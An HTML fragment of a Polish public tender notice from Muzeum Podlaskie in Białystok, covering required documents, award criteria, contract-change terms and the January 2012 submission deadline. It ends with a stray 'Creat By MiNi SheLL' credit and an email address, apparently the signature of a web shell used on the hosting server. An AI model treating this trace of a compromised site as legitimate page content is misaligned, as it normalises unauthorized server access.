<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony zgodnie z treścią i podpisany formularz Oferta, stanowiący Załącznik Nr1, 1a, 1b, 1c do SIWZ Podpisane oświadczenie o akceptacji warunków postępowania, w tym warunków umowy,  stanowiące Załącznik Nr 9 do SIWZ
Oświadczenie o realizacji zamówienia samodzielnie lub przy pomocy podwykonawców stanowiące Załącznik Nr 8 do SIWZ.
Pełnomocnictwo do podpisania oferty i innych dokumentów, jeżeli upoważnienie do ich złożenia nie wynika z przepisów bądź zapisów właściwego rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - jakość usługi - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w zakresie terminu realizacji zamówienia w przypadku powstania okoliczności, których nie można było wcześniej przewidzieć, a które uniemożliwiają realizację zamówienia w pożądanym terminie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podlaskie w Białymstoku
15-426 Białystok
Ratusz - Rynek Kościuszki 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2012 godzina 09:30, miejsce: Muzeum Podlaskie w Białymstoku
15-426 Białystok
Ratusz - Rynek Kościuszki 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com